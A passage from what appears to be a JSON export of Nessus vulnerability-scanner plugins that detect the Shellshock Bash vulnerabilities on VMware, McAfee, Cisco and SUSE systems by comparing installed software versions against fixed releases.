reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-32bit-5.2-147.22.1\")) vuln = TRUE;\n\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\\n' + 'The remote ' + app + ' appliance has one or more outdated packages :' +\n '\\n';\n security_hole(port:0, extra:report+rpm_report_get());\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected because the packages are up-to-date\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:58", "description": "The version of VMware NSX installed on the remote host is 4.x prior to 4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:nsx"], "id": "VMWARE_NSX_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78826", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78826);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware NSX installed on the remote host is 4.x prior to\n4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore,\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/blogs/766093/posts/1976383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware NSX version 4.0.5 / 4.1.4 / 4.2.1 / 6.0.7 / 6.1.1 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:nsx\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_nsx_installed.nbin\");\n script_require_keys(\"Host/VMware NSX/Product\", \"Host/VMware NSX/Version\", \"Host/VMware NSX/Build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nproduct = get_kb_item_or_exit(\"Host/VMware NSX/Product\");\nversion = get_kb_item_or_exit(\"Host/VMware NSX/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware NSX/Build\");\nproduct_name = \"VMware NSX \" + product;\n\nfix = '';\n\nif (version =~ '^4\\\\.0\\\\.' && int(build) < '39236') fix = '4.0.5 Build 39236';\nelse if (version =~ '^4\\\\.1\\\\.' && int(build) < '39250') fix = '4.1.4 Build 39250';\nelse if (version =~ '^4\\\\.2\\\\.' && int(build) < '39256') fix = '4.2.1 Build 39256';\nelse if (version =~ '^6\\\\.0\\\\.' && int(build) < '2176282') fix = '6.0.7 Build 2176282';\nelse if (version =~ '^6\\\\.1\\\\.' && int(build) < '2179522') fix = '6.1.1 Build 2179522';\nelse audit(AUDIT_INST_VER_NOT_VULN, product_name, version, build);\n\nreport =\n '\\n Installed product : ' + product_name +\n '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fix + \n '\\n';\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:23", "description": "The remote host has a version of McAfee Email Gateway (MEG) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-11T00:00:00", "type": "nessus", "title": "McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:email_gateway"], "id": "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79123", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79123);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Email Gateway (MEG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:email_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_email_gateway_version.nbin\");\n script_require_keys(\"Host/McAfeeSMG/name\", \"Host/McAfeeSMG/version\", \"Host/McAfeeSMG/patches\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = get_kb_item_or_exit(\"Host/McAfeeSMG/name\");\nversion = get_kb_item_or_exit(\"Host/McAfeeSMG/version\");\npatches = get_kb_item_or_exit(\"Host/McAfeeSMG/patches\");\n\n# Determine fix.\nif (version =~ \"^5\\.6\\.\")\n{\n fix = \"5.6.2964.108\";\n hotfix = \"5.6h1010267\";\n}\nelse if (version =~ \"^7\\.0\\.\")\n{\n fix = \"7.0.2934.111\";\n hotfix = \"7.0.5h1010264\";\n}\nelse if (version =~ \"^7\\.5\\.\")\n{\n fix = \"7.5.3088.112\";\n hotfix = \"7.5.4h1010253\";\n}\nelse if (version =~ \"^7\\.6\\.\")\n{\n fix = \"7.6.3044.119\";\n hotfix = \"7.6.2h1010246\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1 && hotfix >!< patches)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = '\\n' + app_name + ' ' + version + ' is missing patch ' + hotfix + '.\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port:port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix, app_name, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:24", "description": "According to its self-reported version number, remote Cisco TelePresence Conductor device is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nNote that an attacker must be authenticated before the device is exposed to this exploit.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-26T00:00:00", "type": "nessus", "title": "Cisco TelePresence Conductor Bash Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_conductor"], "id": "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "href": "https://www.tenable.com/plugins/nessus/79584", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79584);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02103\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco TelePresence Conductor Bash Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Cisco TelePresence Conductor device is affected by a\ncommand injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, remote Cisco\nTelePresence Conductor device is affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\n\nNote that an attacker must be authenticated before the device is\nexposed to this exploit.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02103\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.1 / 2.4.1 / 3.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_conductor\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_telepresence_conductor_detect.nbin\");\n script_require_keys(\"Host/Cisco_TelePresence_Conductor/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Conductor\";\nversion = get_kb_item_or_exit(\"Host/Cisco_TelePresence_Conductor/Version\");\n\nif (\n version =~ \"^1(\\.|$)\" ||\n (version =~ \"^2\\.(0|1|2)(\\.|$)\") ||\n (version =~ \"^2\\.3(\\.|$)\" && ver_compare(ver:version, fix:\"2.3.1\", strict:FALSE) < 0) ||\n (version =~ \"^2\\.4(\\.|$)\" && ver_compare(ver:version, fix:\"2.4.1\", strict:FALSE) < 0)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 2.3.1 / 2.4.1 / 3.0' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:32", "description": "The version of VMware Workspace Portal (formerly known as VMware Horizon Workspace) installed on the remote host is missing package updates. It is, therefore, affected by the following vulnerabilities in the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. By sending a specially crafted request to a CGI script that passes environment variables, a remote, unauthenticated attacker can execute arbitrary code on the host. (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169)\n\n - An out-of-bounds memory access error exists due to improper redirection implementation in the 'parse.y' source file. A remote attacker can exploit this issue to cause a denial of service or potentially execute arbitrary code. (CVE-2014-7186)\n\n - An off-by-one error exists in the 'read_token_word' function in the 'parse.y' source file. A remote attacker can exploit this issue to cause a denial of service or potentially execute arbitrary code. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2014-11-04T00:00:00", "type": "nessus", "title": "VMware Workspace Portal Multiple Bash Shell Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["x-cpe:/a:vmware:vmware_horizon_workspace", "x-cpe:/a:vmware:vmware_workspace_portal"], "id": "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78857);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware Workspace Portal Multiple Bash Shell Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a device management application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workspace Portal (formerly known as VMware\nHorizon Workspace) installed on the remote host is missing package\nupdates. It is, therefore, affected by the following vulnerabilities\nin the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock, which is due to the processing of\n trailing strings after function definitions in the\n values of environment variables. This allows a remote\n attacker to execute arbitrary code via environment\n variable manipulation depending on the configuration of\n the system. By sending a specially crafted request to a\n CGI script that passes environment variables, a remote,\n unauthenticated attacker can execute arbitrary code on\n the host. (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278,\n CVE-2014-7169)\n\n - An out-of-bounds memory access error exists due to\n improper redirection implementation in the 'parse.y'\n source file. A remote attacker can exploit this issue\n to cause a denial of service or potentially execute\n arbitrary code. (CVE-2014-7186)\n\n - An off-by-one error exists in the 'read_token_word'\n function in the 'parse.y' source file. A remote attacker\n can exploit this issue to cause a denial of service or\n potentially execute arbitrary code. (CVE-2014-7187)\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2091067\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52af41d9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch as stated in the 2091067 VMware KB advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vmware_horizon_workspace\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vmware_workspace_portal\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"suse_11_bash-140926.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n script_require_ports(\"Host/VMware Horizon Workspace/Version\", \"Host/VMware Workspace Portal/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\n# Check if general SuSE check already ran\nif (get_kb_item(\"Success/77958\")) exit(0, \"Plugin #77958 already found that bash needs to be updated.\");\n\n# Check that the OS is SuSE\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\napp = NULL;\nversion = NULL;\n\nversion = get_kb_item(\"Host/VMware Horizon Workspace/Version\");\nif (!isnull(version))\n{\n app = \"VMware Horizon Workspace\";\n}\nelse\n{\n version = get_kb_item(\"Host/VMware Workspace Portal/Version\");\n app = \"VMware Workspace Portal\";\n}\n\nif (isnull(version)) audit(AUDIT_NOT_INST, \"VMware Horizon Workspace / VMware Workspace Portal\");\n\n# VMware Horizon Workspace affected versions:\n# 1.5.0 - 1.5.2\n# 1.8.0 - 1.8.2\nif (app == \"VMware Horizon Workspace\" && version !~ \"^1\\.[58]\\.[0-2]$\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n# VMware Workspace Portal affected versions:\n# 2.0.0 and 2.1.0\nelse if (app == \"VMware Workspace Portal\" && version !~ \"^2\\.[01]\\.0$\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\nvuln = FALSE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-32bit-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) vuln = TRUE;\n\nif (!vuln) audit(AUDIT_HOST_NOT, \"affected because the packages are up-to-date\");\n\n\nif (report_verbosity > 0)\n{\n report = '\\n' + 'The remote ' + app + ' appliance has one or more outdated packages :' +\n '\\n' +\n rpm_report_get();\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:25", "description": "According to its self-reported version number, the version of Cisco Prime Security Manager installed on the remote host is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "Cisco Prime Security Manager GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:cisco:prime_security_manager"], "id": 